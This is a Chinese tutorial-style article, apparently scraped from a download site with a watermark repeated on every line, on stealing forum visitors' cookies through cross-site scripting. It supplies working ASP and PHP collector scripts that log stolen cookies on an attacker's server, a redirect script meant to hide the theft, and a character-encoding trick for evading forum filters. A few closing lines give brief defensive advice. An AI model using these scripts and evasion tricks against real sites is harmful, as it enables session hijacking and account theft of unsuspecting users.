简单分析Script脚本跨站攻击漏洞技术

您当前位置:首页 > 红讯频道 > 网络技术

  • 红软基地 推荐
  • 2012-01-19
xnc红软基地

 xnc红软基地

  其中http://xxx.xxx.xxx/是大家自己网站空间,cookies.asp是一个asp脚本用于收集xnc红软基地

 xnc红软基地

  msg后边跟的参数,而参数我们指定的是document.cookie,也就是访问此贴用户的cookie。xnc红软基地

  cookies.asp的代码是: xnc红软基地
<%xnc红软基地

  testfile=Server.MapPath("hun.txt")xnc红软基地

  msg=Request("msg")xnc红软基地

  set fs=server.CreateObject("scripting.filesystemobject")xnc红软基地

  set thisfile=fs.OpenTextFile(testfile,8,True,0)xnc红软基地

  thisfile.WriteLine(""&msg& "")xnc红软基地

  thisfile.closexnc红软基地

  set fs = nothingxnc红软基地

  %> xnc红软基地

  这样所有访问者的cookie都会收集在hun.txt这个文件里xnc红软基地

  但是访问者访问我们的帖子,同样会访问到我们的网站的,这样不是露馅了吗?呵呵,但只要我们稍做处理xnc红软基地

  就可以做的相对真实,比如我们加上下面的代码xnc红软基地

  <script language=vbscript>  xnc红软基地
window.location.href="http://xxx.xxx.xxx"  xnc红软基地
</script>xnc红软基地

  这个xxx.xxx.xxx最好换成你攻击的网站的域名,这样做的目的是在他访问我们精心构造的网站同时开打他xnc红软基地

  自己的网站,呵呵,这样是不是会更隐蔽一点呢?xnc红软基地

  这个cookies.asp和有一个同样作用的cookies.php一样,附代码如下: xnc红软基地
<?php  xnc红软基地
$info = getenv("QUERY_STRING");  xnc红软基地
if ($info) {  xnc红软基地
$fp = fopen("cookies.txt","a");  xnc红软基地
fwrite($fp,$info."/n");  xnc红软基地
fclose($fp);  xnc红软基地
xnc红软基地
?>  xnc红软基地

  但是大部份做的不错的论坛,都过滤了javascript这些字符。不过还是有方法可以利用的,xnc红软基地

  可以在论坛发的贴里将javascript写成ascii码。像j可以写成”&#x6a;” xnc红软基地
     xnc红软基地
  防范的方法,就是过滤字符像javascript/<script>/’/;/&/#了等等,xnc红软基地

  当然前提是你的网页还要正常显示。建议大家不要轻易打开一些不明url,要将自己的信箱、论坛、QQ等资料的密码设的都不一样,xnc红软基地

  如果一旦资料或密码被盗,避免引连锁反应,所有资料和密码都被别人获得。这就要用到博大精深是社会工程学了。xnc红软基地

    总结一下吧。跨站的技巧性很强,呵呵大家多积累经验用起来会达到事半功倍的效果。xnc红软基地

来源:红讯频道

专题合集 | 手机游戏 | 最近更新 | 下载排行 | 提交软件 | 在线病毒扫描 | 联系我们 | 版权声明 | 网站地图
Copyright ©2006-2013 红软基地(www.rsdown.cn). 湘ICP备2024053236号-1